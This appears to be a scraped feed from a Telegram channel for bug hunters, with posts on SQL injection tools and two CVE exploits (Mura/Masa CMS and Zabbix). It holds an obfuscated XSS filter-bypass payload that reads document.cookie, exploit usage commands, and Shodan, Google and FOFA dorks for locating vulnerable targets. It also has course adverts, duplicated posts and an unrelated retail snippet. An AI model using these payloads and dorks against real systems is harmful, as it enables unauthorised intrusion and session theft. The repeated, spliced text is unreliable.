demo.gif
10.9 MB
🚨SQLMC - SQL Injection Massive Checker🚨
📢SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
🔗Download https://github.com/malvads/sqlmc
📢SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
🔗Download https://github.com/malvads/sqlmc
👍8
Bypass XSS Filter with Array
Payload :
Payload :
<nonoscript><p noscript="</nonoscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">👍6
A ____ is used to connect to a remote system using NetBIOS.
Final Results
46%
NULL session
13%
Hash
10%
Rainbow table
41%
Rootkit
👍1
Brut Security
A ____ is used to connect to a remote system using NetBIOS.
Answer is NULL Session
👍5😐2
🚨Muraider - Automating the detection & Exploitation of CVE-2024-32640 SQLi in Mura/Masa CMS🚨
⚠Usage- python3 CVE-2024-32640.py --url https://target.com
👉Dorks-
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
🔗Link- https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
👉References:
https://buff.ly/3WKUzc9
https://buff.ly/3WJh1SY
📢For Live Class Enrollment DM in Whatsapp- https://buff.ly/3wOME2W
📝Join Our Telegram- https://buff.ly/3yi0H1o
📝Join Our Community- https://zurl.co/6G4I
⚠Usage- python3 CVE-2024-32640.py --url https://target.com
👉Dorks-
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
🔗Link- https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
👉References:
https://buff.ly/3WKUzc9
https://buff.ly/3WJh1SY
📢For Live Class Enrollment DM in Whatsapp- https://buff.ly/3wOME2W
📝Join Our Telegram- https://buff.ly/3yi0H1o
📝Join Our Community- https://zurl.co/6G4I
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
👍3🔥2
📢 Take the 30-Day Bug Hunting Challenge!
🚨 Get ready to put your skills to the test! The challenge will be starting from June 1st.
👉 Anyone can participate in the challenge by joining our community. This is a self-help goal challenge where you will need to dedicate yourself for 30 days until you successfully find a bug and report it.
🔗 Join the Brut Security Community on Nas.io now: https://nas.io/brutsecurity
📝 For Enquiries DM us in WhatsApp: https://wa.me/918945971332
🚨 Get ready to put your skills to the test! The challenge will be starting from June 1st.
👉 Anyone can participate in the challenge by joining our community. This is a self-help goal challenge where you will need to dedicate yourself for 30 days until you successfully find a bug and report it.
🔗 Join the Brut Security Community on Nas.io now: https://nas.io/brutsecurity
📝 For Enquiries DM us in WhatsApp: https://wa.me/918945971332
👎2
🚨CVE-2024-22120: Zabbix SQLi Vulnerability🚨
⚠POC: https://lnkd.in/gtbSbpvg
⚠POC: https://lnkd.in/gv5t27Vw
👉This time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing attackers to escalate privileges and even achieve remote code execution (RCE).
📢Reference: https://lnkd.in/g3iSTYEy
📝Dorks:
Hunter:/product.name="Zabbix"
FOFA:app="ZABBIX-Monitoring"
SHODAN:http.component:"Zabbix"
⚠POC: https://lnkd.in/gtbSbpvg
⚠POC: https://lnkd.in/gv5t27Vw
👉This time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing attackers to escalate privileges and even achieve remote code execution (RCE).
📢Reference: https://lnkd.in/g3iSTYEy
📝Dorks:
Hunter:/product.name="Zabbix"
FOFA:app="ZABBIX-Monitoring"
SHODAN:http.component:"Zabbix"
👍3🔥2